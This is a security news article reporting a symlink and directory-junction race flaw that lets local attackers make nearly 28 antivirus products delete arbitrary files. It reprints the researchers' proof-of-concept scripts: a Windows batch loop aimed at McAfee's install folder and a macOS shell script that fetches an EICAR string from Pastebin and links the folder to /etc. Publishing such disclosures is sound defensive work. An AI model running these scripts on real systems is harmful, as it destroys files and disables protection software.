Sunday, January 26, 2025
HomeAnti VirusResearchers Exploit Almost Every Anti-Virus Software & Turn Them Into Self Destructive...

Researchers Exploit Almost Every Anti-Virus Software & Turn Them Into Self Destructive Tools

Published on

SIEM as a Service

Follow Us on Google News

Researchers uncovered a simple flaw that existed in nearly 28 Antivirus software that allows malware authors to exploit the system and disable the Antivirus software also turn them into self-destructive tools.

The bug abusing the directory junctions (Windows) and symlinks (macOS & Linux) operation and used it to perform this exploitation.

A directory junction is exclusive to Windows and can only link two directories together; It cannot link files and the directories must be local to the file system.

There is no admin privilege required to exploiting antivirus software that running under the Windows operating system.

A symlink Also called as symbolic link is commonly used within Linux and macOS. Symlink is a type of file that points to another file.

Using both methods, the flaw leverages the privileged file operations to disable the antivirus software or interfere with the operating system to render it useless, etc.

Basically, Antivirus will run in the computers with high privileged state and gaining the highest level of authority to scan all the files and directories to find the unknown and malicious files plus quarantined and moved to the isolated environment.

Due to this nature of the Antivirus, it opens to a wide range of vulnerabilities and various race conditions. eventually, it allows attackers to gain the high-level privilege of vulnerable systems.

Exploitation and Impact

The Exploitation work is simple and the experience malware authors can easily exploit the flaw. but it is highly time-sensitive and import to figure out when to performing the directory junction or symlink.

A local attacker who can attempt to escalate the privilege would be able to find out the correct timing to exploit the flaw.

According to the rack911labs report, “In some of the antivirus software that we exploited, the timing wasn’t important at all and a simple loop statement of running the exploit over and over was all that was needed to manipulate the antivirus software into self-destructing. One second too early or one second too late and the exploit will not work.”

Exploiting Windows (PoC Video)

Researchers attempted the exploitation process against McAfee Endpoint Security for Windows using their proof-of-concept, and they were able to delete the EpSecApiLib.dll file.

“In our testing, we were able to delete any file that was not currently in use including the ability to interfere with the antivirus operations itself”, researchers said.

Exploit code:

:loop
rd /s /q C:\Users\User\Desktop\exploit
mkdir C:\Users\User\Desktop\exploit
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > C:\Users\User\Desktop\exploit\EpSecApiLib.dll
rd /s /q C:\Users\User\Desktop\exploit
mklink /J C:\Users\User\Desktop\exploit “C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform”
goto loop

Exploiting macOS & Linux (PoC Video)

Researchers used their PoC exploit against Norton Internet Security for macOS and downloads the EICAR test-string from Pastebin to bypass real-time protection that leads to preventing the Antivirus to download the test-string from the Norton official website.

While downloading the test-string from Pastebin, the Antivirus immediately detects it as malware and attempt to clean up.

Researchers said ” we were able to identify an approximate delay of 6-8 seconds that allows a race condition to occur that can result in a symlink attack causing any file to be removed due to the fact that the software runs as root.”

Poc Exploit code for MacOS

#!/bin/sh
rm -rf /Users/Username/exploit ; mkdir /Users/Username/exploit
curl -k https://pastebin.com/raw/jZJ6Ekzt > /Users/Username/exploit/passwd
sleep 6
rm -rf /Users/Username/exploit ; ln -s /etc /Users/Username/exploit

This Proof-of-concept also works for some Linux antivirus software and the researchers were able to delete important files that would have rendered the antivirus software.

All the affected Anti-Virus vendors are individually confirmed and almost every antivirus vendor mentioned on this page is now patched.

Users are recommended to apply the newly released patch for the respect Antivirus software that you are installed on your computer.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity and hacking news updates.

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

INE Security Alert: Expediting CMMC 2.0 Compliance

INE Security, a leading global provider of cybersecurity training and certifications, today announced a...

Subaru’s STARLINK Connected Car’s Vulnerability Let Attackers Gain Restricted Access

In a groundbreaking discovery on November 20, 2024, cybersecurity researchers Shubham Shah and a...

Android Kiosk Tablets Vulnerability Let Attackers Control AC & Lights

A security flaw found in Android-based kiosk tablets at luxury hotels has exposed a...

CISA Releases Six ICS Advisories Details Security Issues

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued six Industrial Control Systems (ICS)...

API Security Webinar

Free Webinar - DevSecOps Hacks

By embedding security into your CI/CD workflows, you can shift left, streamline your DevSecOps processes, and release secure applications faster—all while saving time and resources.

In this webinar, join Phani Deepak Akella ( VP of Marketing ) and Karthik Krishnamoorthy (CTO), Indusface as they explores best practices for integrating application security into your CI/CD workflows using tools like Jenkins and Jira.

Discussion points

Automate security scans as part of the CI/CD pipeline.
Get real-time, actionable insights into vulnerabilities.
Prioritize and track fixes directly in Jira, enhancing collaboration.
Reduce risks and costs by addressing vulnerabilities pre-production.

More like this

DarkGate Gained Popularity for its Covert Nature and Antivirus Evasion

DarkGate, a sophisticated Malware-as-a-Service (MaaS) offered by the enigmatic RastaFarEye persona, has surged in...

10 Best Antivirus for Android – 100% Mobile Protection

Choosing the Best Antivirus for Android is the most important concern to protect your...

10 Best Free Antivirus Download For PC 2024

The Best Free Antivirus software is the most important part of Windows, and every...